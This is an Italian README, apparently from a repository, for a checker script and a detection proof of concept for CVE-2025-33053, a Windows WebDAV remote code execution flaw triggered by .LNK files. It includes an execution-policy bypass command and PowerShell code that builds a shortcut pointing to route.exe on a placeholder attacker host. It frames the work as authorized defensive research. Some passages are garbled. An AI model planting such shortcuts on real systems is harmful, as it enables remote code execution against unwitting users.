
CVE-2025-33053 Checker e PoC
Prova del Checker
Prova del PoC
Una suite completa di strumenti per verificare e dimostrare la potenziale sfruttabilità di CVE-2025-33053, una vulnerabilità critica di Remote Code Execution (RCE) basata su WebDAV che colpisce i sistemi Windows.
CVE-2025-33053 consente agli attaccanti di sfruttare i file di collegamento .LNK che fanno riferimento a condivisioni WebDAV remote malevole, portando potenzialmente a Remote Code Execution (RCE) sui sistemi interessati.
.LNK..LNK appositamente creato o accesso diretto a un percorso UNC — Punta a un percorso UNC remoto come:.LNK viene aperto o il percorso UNC viene esplorato manualmente (ad es. tramite Esplora File): - Il servizio WebClient avvia la comunicazione con la posizione UNC remota tramite WebDAV. - Il sistema invia una richiesta PROPFIND per interrogare i metadati dal server dell'attaccante.CVE-2025-33053_checker.ps1)| Verifica | Scopo |
|---|---|
| 🔍 Stato del servizio WebClient | Conferma se il supporto WebDAV è attivo e in esecuzione. |
| 🔍 Gestione dei percorsi UNC tramite Test-Path | Verifica se il sistema risolve i percorsi UNC WebDAV remoti (precondizione chiave per lo sfruttamento della CVE). |
Apri PowerShell come amministratore.
Se l'esecuzione degli script è limitata, esegui:
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
Cosa fa:
Nota: testato in VM.
Utilizzo:
python3 CVE-2025-33053_PoC.py --port 8000
\\<Kali-IP>@8000\DavWWWRoot\route.exe
\\<Kali-IP>@8000\DavWWWRoot\route.exe
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!
✔️ Usa la risoluzione reale dei percorsi UNC — nessuna simulazione. ✔️ Cattura le richieste PROPFIND reali innescate dal sistema operativo — il comportamento esatto richiesto per lo sfruttamento della CVE. ✔️ Dimostra prove reali a livello di rete della vulnerabilità, senza eseguire payload o causare danni.
Questo PoC non sfrutta né danneggia il sistema target — rileva solo il comportamento vulnerabile sottostante. Da utilizzare in ambienti controllati o con autorizzazione esplicita. Dimostra il comportamento reale del sistema — non una simulazione fittizia. Da utilizzare solo per scopi educativi. Non eseguirlo su sistemi non autorizzati.
Licenza MIT — Gratuita solo per scopi educativi, di ricerca e difensivi.
Pull Request benvenute — migliora il rilevamento, aggiungi funzionalità o proponi correzioni.
Questo repository è solo per ricerca sulla sicurezza a scopo educativo e autorizzata. È severamente vietato l'uso improprio contro sistemi che non possiedi o per i quali non hai il permesso di testarli.